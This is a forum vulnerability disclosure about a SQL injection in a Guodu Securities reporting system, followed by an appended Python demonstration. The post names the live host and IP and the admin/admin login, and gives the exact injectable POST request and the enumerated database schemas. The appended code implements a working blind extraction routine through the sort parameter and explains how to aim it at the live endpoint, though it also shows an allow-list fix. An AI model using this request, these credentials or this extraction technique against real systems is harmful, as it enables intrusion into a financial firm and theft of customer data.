HanDs
Administrator

[July vulnerability disclosure] SQL injection vulnerability in a Guodu Securities (国都证券) system



Details:

The problem is on http://im.guodu.com:9090,



First, the system was entered with a weak password: http://111.205.160.129:9090/report

admin admin



An injection point was found; the request sent is as follows:

Code:
POST /report/Service/kpi/pageCustomerCount HTTP/1.1
Host: 111.205.160.129:9090
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://111.205.160.129:9090/report/Service/kpi/count/customer
Content-Length: 143
Cookie: JSESSIONID=CA77F75B4233D0EF890FBD1C9E973215
Connection: keep-alive

startDate=2016%2F05%2F23+00%3A00%3A00&endDate=2016%2F06%2F7+23%3A59%3A59&companyId=1&showFooter=false&page=1&rows=20&sort=customerId&order=asc





The sort parameter is injectable.

[screenshot: 14659554910914.jpg]





Two tables in the GUODURA database were seen to hold very large amounts of data:

[screenshot: 1.jpg]



[screenshot: 2.jpg]



The full list of databases is as follows:

Code:
[*] APEX
[*] CENTER_ADMIN
[*] CENTER_ETL
[*] CENTER_ETL2
[*] CENTER_PUB
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] GDCMS
[*] GDZQ
[*] GUODU
[*] GUODURA
[*] JRTZ
[*] MDSYS
[*] MONI
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] RATEST
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] UCSTAR
[*] WEIXIN
[*] WMSYS
[*] WSYYT
[*] WSYYT_TEST
[*] XDB



Proof of vulnerability:

Same as above

Fix:


#1
Posted: 2016-7-6   |   Views: 0   |   Replies: 0
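The post names the injectable parameter but does not show how a sort-column injection is actually exploited, and its fix section is empty. The following is an added example, not code from the post or from the Guodu system. It uses an in-memory SQLite database with constructed sample tables (customer, app_user, an admin password, and endpoint-style function names are all assumptions standing in for the real report backend, which is not SQLite). It shows the concatenated ORDER BY that makes `sort` injectable, a boolean-based blind probe that turns the returned row order into a one-bit oracle and reads a value from another table one character at a time, and the allow-list mapping that closes the hole.

```python
import sqlite3

# Constructed sample data: a stand-in for the report's customer table and for a
# second table holding a value the attacker wants to read. Schema is hypothetical.
CUSTOMERS = [
    (1, "alice", 500),
    (2, "bob", 300),
    (3, "carol", 900),
]
ADMIN_PASSWORD = "admin-secret"   # constructed; the value the blind probe recovers


def make_db():
    """Build an in-memory SQLite database with the constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE customer (customerId INTEGER, name TEXT, balance INTEGER)")
    conn.executemany("INSERT INTO customer VALUES (?, ?, ?)", CUSTOMERS)
    conn.execute("CREATE TABLE app_user (username TEXT, password TEXT)")
    conn.execute("INSERT INTO app_user VALUES ('admin', ?)", (ADMIN_PASSWORD,))
    return conn


def page_customers_vulnerable(conn, sort, order, page=1, rows=20):
    """Vulnerable pattern: sort/order are concatenated straight into ORDER BY.

    Identifiers cannot be passed as bind parameters, so code like this is how
    an ORDER BY injection usually ends up in a paging endpoint.
    """
    sql = (
        "SELECT customerId, name, balance FROM customer "
        f"ORDER BY {sort} {order} LIMIT ? OFFSET ?"
    )
    return conn.execute(sql, (rows, (page - 1) * rows)).fetchall()


def ids_for_condition(conn, condition):
    """Attacker-side helper: make the sort key depend on `condition`.

    When the condition is true the rows come back ordered by balance, otherwise
    by name, so the order of customerIds leaks one bit per request.
    """
    sort = f"(CASE WHEN ({condition}) THEN balance ELSE name END)"
    return [row[0] for row in page_customers_vulnerable(conn, sort, "asc")]


ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789-_"


def extract_admin_password(conn, max_len=32):
    """Boolean-based blind extraction through the injectable sort parameter."""
    target = "(SELECT password FROM app_user WHERE username = 'admin')"
    true_sig = ids_for_condition(conn, "1=1")
    false_sig = ids_for_condition(conn, "1=0")
    if true_sig == false_sig:
        raise RuntimeError("ordering does not distinguish true from false")

    # First learn the length, then recover one character per position.
    length = next(
        (n for n in range(1, max_len + 1)
         if ids_for_condition(conn, f"length({target}) = {n}") == true_sig),
        None,
    )
    if length is None:
        return None

    recovered = []
    for i in range(1, length + 1):
        for c in ALPHABET:
            if ids_for_condition(conn, f"substr({target}, {i}, 1) = '{c}'") == true_sig:
                recovered.append(c)
                break
        else:
            recovered.append("?")   # character outside the probe alphabet
    return "".join(recovered)


# Hardened version: map client-supplied names onto a fixed allow-list of column
# names and directions; anything else is rejected before it reaches the SQL.
SORT_COLUMNS = {"customerId": "customerId", "name": "name", "balance": "balance"}
ORDERS = {"asc": "ASC", "desc": "DESC"}


def sort_allowed(sort, order):
    return sort in SORT_COLUMNS and order.lower() in ORDERS


def page_customers_safe(conn, sort, order, page=1, rows=20):
    if not sort_allowed(sort, order):
        raise ValueError("invalid sort or order parameter")
    sql = (
        "SELECT customerId, name, balance FROM customer "
        f"ORDER BY {SORT_COLUMNS[sort]} {ORDERS[order.lower()]} LIMIT ? OFFSET ?"
    )
    return conn.execute(sql, (rows, (page - 1) * rows)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("recovered via sort injection:", extract_admin_password(db))
    print("safe query:", page_customers_safe(db, "balance", "desc"))
```

Against the live endpoint the same probe would be sent through the POST request shown above with `sort=` set to the CASE expression and the response row order compared. Escaping does not help here because ORDER BY takes an identifier, not a value; the only robust fix is the allow-list, which is why the hardened version never places client input in the query text at all.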